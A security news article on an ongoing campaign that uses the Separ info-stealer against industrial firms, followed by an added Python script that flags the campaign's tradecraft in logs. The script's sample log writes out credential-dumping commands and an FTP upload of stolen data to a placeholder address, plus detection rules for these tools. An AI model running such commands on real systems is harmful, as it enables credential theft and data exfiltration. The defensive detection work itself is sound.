Ongoing cyber-espionage campaign targets hundreds of industrial firms

CyberX’s Section 52 threat intelligence team has warned of a new, ongoing cyber-espionage campaign aimed at manufacturing and other industrial firms. More than half of the targeted companies are based in South Korea, but victims were also detected in China, Thailand, Japan, Indonesia, Turkey, Germany, the UK and Ecuador. The team has identified more than 200 compromised organizations, including an unnamed multi-billion-dollar Korean conglomerate that manufactures critical infrastructure equipment, as well as a steel manufacturer, a chemical plant construction firm, a pipe manufacturer, a valve manufacturer and an engineering firm.

The goal of the campaign, dubbed Gangnam Industrial Style, is information theft: passwords and documents that can be used to steal trade secrets and intellectual property, to carry out reconnaissance for future attacks, or to gain a foothold in industrial control networks for ransomware attacks. To achieve this, the adversary uses a new version of an older information stealer called Separ.

The malware is delivered via spear-phishing emails with industrial-themed attachments chosen to interest the targeted companies. These include an RFQ (request for quotation) for designing a power plant in the Czech Republic, supposedly sent by a Siemens subsidiary; an RFQ for designing a coal-fired power plant in Indonesia, supposedly sent by the engineering subsidiary of a major Japanese conglomerate; and an email purporting to come from a major European engineering company that designs gas processing and production plants.

The malware itself is carried in malicious ZIP attachments disguised as PDF files. Once installed, Separ steals browser and email credentials and searches for documents with a range of extensions, including Office documents and images. The collected data is then uploaded via FTP to an attacker-controlled server.

According to the researchers, the latest Separ variant uses the Windows Autorun feature to survive system reboots and bundles a set of mostly freely available tools:

Browser Password Dump v6.0 by SecurityXploded

Email Password Dump v3.0 by SecurityXploded

NcFTPPut 3.2.5 – Free FTP client

The LaZagne Project (password dumper)

deltree (folder delete)

Command Line Process Viewer/Killer/Suspender for Windows NT/2000/XP V2.03

MOVEit Freely 1.0.0.1 – Secure FTP Client

Sleep tool by tricerat

"The new version also uses certain components that were not used in the previous version including: The LaZagne Project, deltree, MOVEit Freely 1.0.0.1 – Secure FTP Client, and 'Command Line Process Viewer/Killer/Suspender for Windows NT/2000/XP V2.03'," researchers noted.
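The collection and exfiltration chain described above (off-the-shelf credential dumpers, an FTP upload tool, Autorun persistence and a disguised attachment) maps onto a handful of host-level detections. The following Python script is an added example, not code from CyberX or from this article: it runs those rules over constructed, Sysmon-style log lines and only escalates when a credential dumper and an FTP upload appear together. The pipe-separated log format, the executable names (laZagne.exe, ncftpput.exe, BrowserPasswordDump.exe), the Run-key value name and every sample line are assumptions made for illustration; the page names the products, not their binaries or command lines.

```python
"""Host-level triage for the Separ tradecraft described in the article.

Added example, not CyberX's or the article's code. The pipe-separated log
format, the executable names and the sample lines below are assumptions
made for illustration; the page names the tools, not their binaries."""
import re
from dataclasses import dataclass

# Constructed, Sysmon-like records: kind|time|image|command line or registry target|
SAMPLE_LOG = """\
ProcessCreate|2019-12-16T09:12:01|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs|
ProcessCreate|2019-12-16T09:12:44|C:\\Users\\kim\\AppData\\Local\\Temp\\RFQ_PowerPlant.pdf.exe|RFQ_PowerPlant.pdf.exe|
ProcessCreate|2019-12-16T09:12:45|C:\\Users\\kim\\AppData\\Local\\Temp\\lz\\laZagne.exe|laZagne.exe all -oN|
ProcessCreate|2019-12-16T09:12:46|C:\\Users\\kim\\AppData\\Local\\Temp\\bpd.exe|BrowserPasswordDump.exe -f out.txt|
ProcessCreate|2019-12-16T09:12:47|C:\\Users\\kim\\AppData\\Local\\Temp\\ncftpput.exe|ncftpput.exe -u upl -p s3cret 203.0.113.7 /inbox C:\\Users\\kim\\AppData\\Local\\Temp\\out.zip|
RegistrySet|2019-12-16T09:12:48|C:\\Users\\kim\\AppData\\Local\\Temp\\RFQ_PowerPlant.pdf.exe|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater|
ProcessCreate|2019-12-16T09:13:02|C:\\Program Files\\Mozilla Firefox\\firefox.exe|firefox.exe|
"""

# Tools the article lists, keyed by a lowercase substring expected in the
# image name or command line. Binary names are assumed, not from the page.
TOOL_MARKERS = {
    "lazagne": ("credential_dumper", "The LaZagne Project"),
    "browserpassworddump": ("credential_dumper", "Browser Password Dump (SecurityXploded)"),
    "emailpassworddump": ("credential_dumper", "Email Password Dump (SecurityXploded)"),
    "ncftpput": ("ftp_client", "NcFTPPut"),
    "deltree": ("cleanup_tool", "deltree"),
}
FTP_CREDS_RE = re.compile(r"-u\s+\S+\s+-p\s+\S+")                 # inline FTP user/password
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)  # Autorun persistence
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?)\.(exe|scr|com|bat|js)$", re.I)


@dataclass
class Event:
    kind: str
    time: str
    image: str
    detail: str  # command line for ProcessCreate, target value for RegistrySet


@dataclass
class Finding:
    time: str
    rule: str
    evidence: str


def parse_log(text: str) -> list[Event]:
    """Parse pipe-separated records; malformed lines are skipped, not raised."""
    events = []
    for line in text.splitlines():
        parts = line.split("|")
        if len(parts) < 4 or not parts[0]:
            continue
        events.append(Event(parts[0], parts[1], parts[2], parts[3]))
    return events


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def analyze(events: list[Event]) -> list[Finding]:
    """Apply the per-event rules; each rule fires at most once per event."""
    findings = []
    for ev in events:
        name = basename(ev.image).lower()
        cmd = ev.detail.lower()
        if ev.kind == "ProcessCreate":
            # Match the image name or the command line, so a renamed binary is
            # still caught when its original name survives in the command line.
            for marker, (rule, desc) in TOOL_MARKERS.items():
                if marker in name or marker in cmd:
                    findings.append(Finding(ev.time, rule, f"{desc}: {ev.detail}"))
            if "ncftpput" in cmd and FTP_CREDS_RE.search(ev.detail):
                findings.append(Finding(ev.time, "ftp_upload_inline_creds", ev.detail))
            if DOUBLE_EXT_RE.search(name):
                findings.append(Finding(ev.time, "double_extension_executable", ev.image))
        elif ev.kind == "RegistrySet" and RUN_KEY_RE.search(ev.detail):
            findings.append(Finding(ev.time, "run_key_persistence", f"{basename(ev.image)} -> {ev.detail}"))
    return findings


def campaign_match(findings: list[Finding]) -> bool:
    """Escalate only when a credential dumper and an FTP upload both appear;
    either one alone is common admin or developer activity."""
    rules = {f.rule for f in findings}
    return "credential_dumper" in rules and "ftp_upload_inline_creds" in rules


if __name__ == "__main__":
    hits = analyze(parse_log(SAMPLE_LOG))
    for h in hits:
        print(f"{h.time} {h.rule}: {h.evidence}")
    print("campaign pattern:", campaign_match(hits))
```

On the constructed sample the script raises six findings (two credential dumpers, the FTP client, its upload with inline credentials, the double-extension dropper and the Run-key write) and reports the campaign pattern as matched. Against real telemetry the same rules would read Sysmon Event ID 1 (process creation) and 13 (registry value set); substring matching on tool names is the weakest of the rules, since the operator can rename the binaries, so the FTP-with-credentials and Run-key rules carry more weight.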

According to CyberX, newly stolen credentials are still being uploaded to the attackers' command-and-control server, indicating that the campaign is still ongoing.